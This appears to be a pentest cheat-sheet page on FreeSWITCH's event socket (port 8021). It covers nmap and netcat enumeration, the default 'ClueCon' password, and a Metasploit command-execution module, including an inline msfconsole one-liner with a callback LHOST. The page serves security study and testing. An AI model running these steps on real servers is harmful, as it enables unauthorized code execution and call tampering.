FreeSWITCH (8021)

101

FreeSWITCH is an open-source VoIP platform commonly used for PBX systems, SIP trunking, and conferencing services. The mod_event_socket module in FreeSWITCH opens a TCP socket—typically on port 8021—which allows external applications to communicate with the switch using a command/response protocol.

This interface should never be exposed externally without robust access controls. If an attacker guesses or knows the event_socket_password—which defaults to ClueCon in many installations—they can authenticate and issue commands to the FreeSWITCH server. With successful authentication, an attacker could list and manage calls, inject audio or messages, execute arbitrary dial plans, and potentially escalate privileges further depending on the system's configuration.

Enumeration

# TCP scan with nmap
PORT     STATE SERVICE       VERSION

8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket

# Manual service probbing
$ nc -nv 192.168.244.151 8021
(UNKNOWN) [192.168.244.151] 8021 (zope-ftp) open
Content-Type: auth/request
...
Content-Type: text/disconnect-notice
Content-Length: 67

Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/

Upon probing with nc, the connection to the port succeeds and returns the message: Content-Type: auth/request, indicating that FreeSWITCH is prompting for a password. Authentication is usually performed using the command auth <password>. If the password is correct, the server responds with Content-Type: command/reply Reply-Text: +OK accepted.

Attacks

# Check default credentials
$ creds search freeswitch
+------------+----------+----------+
| Product    | username | password |
+------------+----------+----------+
| freeswitch | <blank>  | ClueCon  |
+------------+----------+----------+

# Check public exploits
$ searchsploit freeswitch
...
FreeSWITCH - Event Socket Command Execution (Metasploit)                  
| multiple/remote/47698.rb

A Metasploit module exists for the above RCE vulnerability:

msf > use exploit/multi/misc/freeswitch_event_socket_cmd_exec
msf exploit(freeswitch_event_socket_cmd_exec) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Unix (In-Memory)
    1   Linux (Dropper)
    2   PowerShell (In-Memory)
    3   Windows (In-Memory)
    4   Windows (Dropper)
    
msf exploit(freeswitch_event_socket_cmd_exec) > set TARGET <target-id>
msf exploit(freeswitch_event_socket_cmd_exec) > show options
msf exploit(freeswitch_event_socket_cmd_exec) > exploit

# Inline command
sudo msfconsole -q -x "use exploit/multi/misc/freeswitch_event_socket_cmd_exec; set TARGET 3; set RHOSTS <target-ip>; set LHOST tun0; run;"

PreviousWiFi Mouse (1978)NextMobile Mouse (9099)

Last updated 26 days ago

Was this helpful?